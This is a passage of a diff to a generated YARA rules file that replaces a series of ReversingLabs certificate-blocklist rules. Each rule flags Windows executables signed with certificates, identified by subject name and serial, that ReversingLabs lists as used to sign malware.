"SPECTACLE IMAGE LTD" and pe.signatures[i].serial=="09:3f:e6:3d:1a:5f:68:f1:4e:ca:ac:87:1a:03:f7:a3" and 1562716800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Bb26B7B6634D5Db548C437B5085B01C1 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2a56ff80-584b-5b8b-80ae-e763339cd17a" + id = "443a876a-dfd7-5a9e-bb15-a44a53363494" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10088-L10106" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "74b1b48f0179187ea7bb8ef4663bf13da47f5c6405ecc5589706184564c05727" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4086-L4104" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "58d574b196f84416eb04000205cd8f4817618003f2948bb0eb7d951c282ef6ff" score = 75 quality = 90 tags = "INFO, FILE" @@ -14287,22 +34078,22 @@ rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ambidekstr LLC" and (pe.signatures[i].serial=="00:c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" or pe.signatures[i].serial=="c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7") and 1616976000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"IT Mott\"" and (pe.signatures[i].serial=="00:bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" or pe.signatures[i].serial=="bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1") and 1591919307<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_29128A56E7B3Bfb230742591Ac8B4718 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9019330e-5ab5-5d37-85a1-0e882dbd68ce" + id = "b868d2f2-3852-57a3-be01-32cc16eb2ff7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10108-L10124" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f6780751ae553771eb57201a8672847a24512e6279b6a4fd843d8ee2f326860a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4106-L4122" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5a89fec015e56ddddaed75be91a87288dcd27841937d26e3416187913c4f0b85" score = 75 quality = 90 tags = "INFO, FILE" @@ -14312,22 +34103,22 @@ rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Venezia Design SRL" and pe.signatures[i].serial=="04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" and 1641859201<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Programavimo paslaugos, MB" and pe.signatures[i].serial=="29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" and 1590900909<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Bfbfdfef43608730Ee14779Ee3Ee2Cb : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "78f9fdf0-d8c6-5316-8053-42f77adf95d1" + id = "fdc2f6a0-8fae-537e-812f-b0c292f76b1e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10126-L10142" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f10316a26e2d34400b7c2e403eab18ab6c1cc94b35f0ac8a3f490d101d29dc8d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4124-L4140" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f8f233b78e9d3558b0cd7978e3c5fa32645a3bb706c6fdec7f1e4195cf513f10" score = 75 quality = 90 tags = "INFO, FILE" @@ -14337,22 +34128,22 @@ rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "APRIL BROTHERS LTD" and pe.signatures[i].serial=="12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" and 1642464000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CSTech Software Inc." and pe.signatures[i].serial=="7b:fb:fd:fe:f4:36:08:73:0e:e1:47:79:ee:3e:e2:cb" and 1590537600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_62205361A758B00572D417Cba014F007 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "88ca65c4-ba0d-5676-979b-4fac737d4f21" + id = "85da8e0e-d791-5fed-b9ea-c681462651a6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10144-L10160" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ea7d9fa7817751fef775765b54be5dd4d00c15ca50ac10fb40fb46cc3634c7b0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4142-L4158" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ebf28921c81191bcf6130baf6532122bb320cc916e38ab225f0acdcb57ea00f3" score = 75 quality = 90 tags = "INFO, FILE" @@ -14362,22 +34153,22 @@ rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Office Rat s.r.o." and pe.signatures[i].serial=="3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" and 1643155200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UNITEKH-S, OOO" and pe.signatures[i].serial=="62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" and 1590470683<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4B47D18Dbea57Abd1563Ddf89F87A6C2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1e66d13c-3345-592c-9bf8-b8a566c8b9e6" + id = "689c1f80-3b3c-5bd7-9129-4f508cad7fb4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10162-L10178" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3f64372d11d61c669580d90cdf2201e7f2904fb3d73d27be2ff1559c9c37614a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4160-L4176" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2e464f4e9bfe0c9510a78552acffb241d2435ea9bf3f5f2501353d7f8f280d78" score = 75 quality = 90 tags = "INFO, FILE" @@ -14387,22 +34178,22 @@ rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAMOYAJ LIMITED" and pe.signatures[i].serial=="02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" and 1637712001<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KBK, OOO" and pe.signatures[i].serial=="4b:47:d1:8d:be:a5:7a:bd:15:63:dd:f8:9f:87:a6:c2" and 1590485607<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Be41E2C7Bb2493044B9241Abb732599D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6da50886-7f15-5565-9a1a-f6fb25a729ac" + id = "81e5a8f3-0893-534a-ab4f-5c2c47078b40" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10180-L10198" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3f3f1d5c871d2b73627d4281ac5bcd08799fb47f94155e82795d97c87de35e40" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4178-L4196" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "eb5d94b80fd030d14dc26878895c61761825f3c77209ca0280e88dcd1800f9c2" score = 75 quality = 90 tags = "INFO, FILE" @@ -14412,22 +34203,22 @@ rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HOUSE 9A s.r.o" and (pe.signatures[i].serial=="00:d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" or pe.signatures[i].serial=="d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df") and 1640822400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Company Babylon" and (pe.signatures[i].serial=="00:be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" or pe.signatures[i].serial=="be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d") and 1589146251<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_15C5Af15Afecf1C900Cbab0Ca9165629 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f7dd21fa-1501-50b2-bd9c-c33cfd932a6b" + id = "de734943-e735-5895-b76e-5f8588a77540" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10200-L10216" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a63c05cca23b61ba6eabda2b60c617b966a2669fd3a0da30354792e5c1ae2140" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4198-L4214" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5c54f32dbac271b2b60ec40bd052b5566a512cd2bcb4255057b21262806882d2" score = 75 quality = 90 tags = "INFO, FILE" @@ -14437,22 +34228,22 @@ rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "videoalarm s. r. o." and pe.signatures[i].serial=="73:48:19:46:3c:11:95:bd:6e:13:5c:e4:d5:bf:49:bc" and 1637884800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kompaniya Auttek" and pe.signatures[i].serial=="15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" and 1586091840<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_476De2F108D20B43Ba3Bae6F331Af8F1 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "527b7963-340e-5d8f-b7e1-1269c0073ec9" + id = "5a741e6d-9b58-5536-8987-b3c36cdfcd5f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10218-L10236" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "895983bcb7f3a0c5ce54504f4a2ff8d652137434b8951380d756de6556d0844e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4216-L4232" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e5edf3e15b2139ba6cd85f2cfea63b53f7fa36a3fd7224a4a9ccbe5de6eb6f1d" score = 75 quality = 90 tags = "INFO, FILE" @@ -14462,22 +34253,22 @@ rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SPSLTD PLYMOUTH LTD" and (pe.signatures[i].serial=="00:db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" or pe.signatures[i].serial=="db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b") and 1621296000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digiwill Limited" and pe.signatures[i].serial=="47:6d:e2:f1:08:d2:0b:43:ba:3b:ae:6f:33:1a:f8:f1" and 1588135722<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_08Ddcc67F8Cad6929607E4Cda29B3503 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b531341a-e8ac-5b56-a202-3c072f5d2ce0" + id = "3563547f-556b-56e3-ad25-cfec0294fe93" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10238-L10254" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7c9476a4119e013c8bb3c14b607090d592feaa5f2fc0f78d810555681d4a3733" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4234-L4250" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4cd975312ca825b51f34f5c89184a56526877436224c1e7407d715b28ebfd9d5" score = 75 quality = 90 tags = "INFO, FILE" @@ -14487,22 +34278,22 @@ rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hermetica Digital Ltd" and pe.signatures[i].serial=="0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" and 1618272000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FAN-CHAI, TOV" and pe.signatures[i].serial=="08:dd:cc:67:f8:ca:d6:92:96:07:e4:cd:a2:9b:35:03" and 1564310268<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_052242Ace583Adf2A3B96Adcb04D0812 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "727aba82-c908-51a6-9f1f-7fd8df424d8c" + id = "22104929-e2c5-565c-975c-826f666e78e2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10256-L10274" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cef717e7fe3eb0fb958d405caaf98fa51b22b150ccbf1286d3b4634e9df81ade" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4252-L4268" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e1593a2bf375912e411d5f19d9e232c6b87f0897bb6f1c0b0539380b34b05af5" score = 75 quality = 90 tags = "INFO, FILE" @@ -14512,22 +34303,22 @@ rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CUT AHEAD LTD" and (pe.signatures[i].serial=="00:c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" or pe.signatures[i].serial=="c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90") and 1644624000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FAN-CHAI, TOV" and pe.signatures[i].serial=="05:22:42:ac:e5:83:ad:f2:a3:b9:6a:dc:b0:4d:08:12" and 1573603200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Bebef5C533Ce92Efc402Fab8605C43Ec : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1268461b-676c-59b8-80c1-c54dbe1a265f" + id = "59d3dd01-47bc-59ee-8fe7-fd5b1af8f9f4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10276-L10294" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "949bbd41ad4c83a05c1f004786cd296e2af80a3a559955ec90a4675cdfa04258" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4270-L4288" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "daa57ad622799467c60693060e6c9eea18bdf0bb26f178e8b03453aab486ccf4" score = 75 quality = 90 tags = "INFO, FILE" @@ -14537,22 +34328,22 @@ rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE FAITH SP Z O O" and (pe.signatures[i].serial=="00:c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" or pe.signatures[i].serial=="c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7") and 1644969600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO VEKTOR" and (pe.signatures[i].serial=="00:be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" or pe.signatures[i].serial=="be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec") and 1587513600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1D3F39F481Fe067F8A9289Bb49E05A04 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4520e544-7a41-5dde-b90b-46cf3349297c" + id = "0c4b6efb-c793-5505-bcd6-f62266c984c6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10296-L10312" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "23ac7a97e7632536ed27cf9078b6bc1a734f1e991a20a228734b45117582f367" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4290-L4306" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2fdf8b59d302d2ce81a1e9a5715138adc1ec45bd86871c4c2e46412407e329f9" score = 75 quality = 90 tags = "INFO, FILE" @@ -14562,22 +34353,22 @@ rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Zimmi Consulting Inc" and pe.signatures[i].serial=="06:fa:27:a1:21:cc:82:23:0c:30:13:ee:63:4b:6c:62" and 1645142401<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LOGIKA, OOO" and pe.signatures[i].serial=="1d:3f:39:f4:81:fe:06:7f:8a:92:89:bb:49:e0:5a:04" and 1592553220<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Be35D025E65Cc7A4Ee01F72 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "25229478-e891-5e0a-b738-6ca1fdd0012c" + id = "533bcad1-b589-5a05-8f35-32fcb79c7f68" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10314-L10332" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d4f1b75dddd47fe8a19bd8e794b4930bdcaf54d63db57422db0a9b631d4f488d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4308-L4324" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dad7ab834a67d36c0b63e45922aea566dc0aaf922be2b74161616b3caea83fdc" score = 75 quality = 90 tags = "INFO, FILE" @@ -14587,22 +34378,22 @@ rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DOD MEDIA LIMITED" and (pe.signatures[i].serial=="00:9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" or pe.signatures[i].serial=="9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac") and 1646438400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Logika OOO" and pe.signatures[i].serial=="7b:e3:5d:02:5e:65:cc:7a:4e:e0:1f:72" and 1594976445<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_351Fe2Efdc0Ac56A0C822Cf8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4e23648f-9770-53ad-9c62-6e6239a02aa7" + id = "ac6b7c6d-781b-5c91-80fe-b822ee00ea7f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10334-L10350" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "db3ac3ee326c60e9abc94a2fb53d801637f044e7ab72d69e53958799e48747b7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4326-L4342" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "46b87c3531e01ba150f056ec3270564426363ef8c58256eeedbcab247c7625e4" score = 75 quality = 90 tags = "INFO, FILE" @@ -14612,22 +34403,22 @@ rule 